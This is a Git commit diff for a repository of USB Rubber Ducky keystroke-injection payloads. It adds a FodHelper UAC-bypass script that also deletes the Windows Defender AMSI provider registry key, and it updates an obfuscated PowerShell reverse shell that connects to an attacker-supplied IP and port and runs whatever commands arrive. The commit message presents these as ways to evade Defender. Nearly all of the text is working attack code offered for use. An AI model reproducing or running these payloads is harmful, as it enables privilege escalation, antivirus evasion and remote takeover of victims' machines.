Updated ReverseDucky to v. 1.1 (#17)
* Uploaded ReverseDuckyII ReverseDucky2 - A faster way to gain a reverse shell & easier to configure Obfuscated Powershell code to bypass AMSI & Windows Defender. * Update ReverseDucky to v. 1.1 Updated ReverseDucky to version 1.1 - Shorten the code (Now faster than RDII) & still evade Defender. * Update ReverseDucky.txt * Create DuckyHelper UAC bypass for privilege escalation (Method FodHelper)pull/19/head
0iphor13
GitHub
parent
2509641d36
commit
f3c751a046
|
|
@ -0,0 +1,47 @@
|
|||
REM DuckyHelper
|
||||
REM Version 1.0
|
||||
REM OS: Windows 10
|
||||
REM Author: 0iphor13
|
||||
|
||||
REM UAC bypass for privilege escalation (Method FodHelper)
|
||||
REM AV will notify, but payload will still be executed
|
||||
REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]
|
||||
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo
|
||||
DELAY 100
|
||||
STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e
|
||||
DELAY 100
|
||||
STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC
|
||||
DELAY 100
|
||||
STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H
|
||||
DELAY 100
|
||||
STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys
|
||||
DELAY 100
|
||||
STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3;Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
DELAY 5000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -Exec Bypass
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
DELAY 300
|
||||
STRING exit
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
|
@ -1,12 +1,11 @@
|
|||
# ReverseDucky
|
||||
# Version 1.0
|
||||
# Author: 0iphor13
|
||||
#
|
||||
# A Reverse shell executed in the background with powershell
|
||||
# LINE 23 - Fill the IP blocks (*FIRST BLOCK* etc) - 192 | 168 | 178 | 33
|
||||
# LINE 25 - Change *PORT* to Port number
|
||||
# DON'T FORGET TO START LISTENER
|
||||
REM ReverseDucky
|
||||
REM Version 1.1
|
||||
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
||||
REM Author: 0iphor13
|
||||
|
||||
REM Reverse shell executed in the background
|
||||
REM Fill in Attacker IP & Port in line 18
|
||||
REM DON'T FORGET TO START LISTENER
|
||||
|
||||
DELAY 1500
|
||||
GUI r
|
||||
|
|
@ -16,28 +15,14 @@ DELAY 250
|
|||
ENTER
|
||||
|
||||
DELAY 200
|
||||
STRING SeT-ITeM VARIABLE:Q528Yl ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT') ) ;${clie
|
||||
STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl
|
||||
DELAY 200
|
||||
STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc
|
||||
STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n
|
||||
DELAY 200
|
||||
STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'),
|
||||
STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | .
|
||||
DELAY 200
|
||||
STRING PORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655
|
||||
DELAY 200
|
||||
STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt
|
||||
DELAY 200
|
||||
STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1
|
||||
DELAY 200
|
||||
STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0
|
||||
DELAY 200
|
||||
STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc
|
||||
DELAY 200
|
||||
STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI VaRiABLE:Q528YL )."vA
|
||||
DELAY 200
|
||||
STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't
|
||||
DELAY 200
|
||||
STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus
|
||||
DELAY 200
|
||||
STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke()
|
||||
STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0,
|
||||
DELAY 200
|
||||
STRING $sbt.Length);$S.Flush()};$C.Close()
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
|
|
|||
Loading…
Reference in New Issue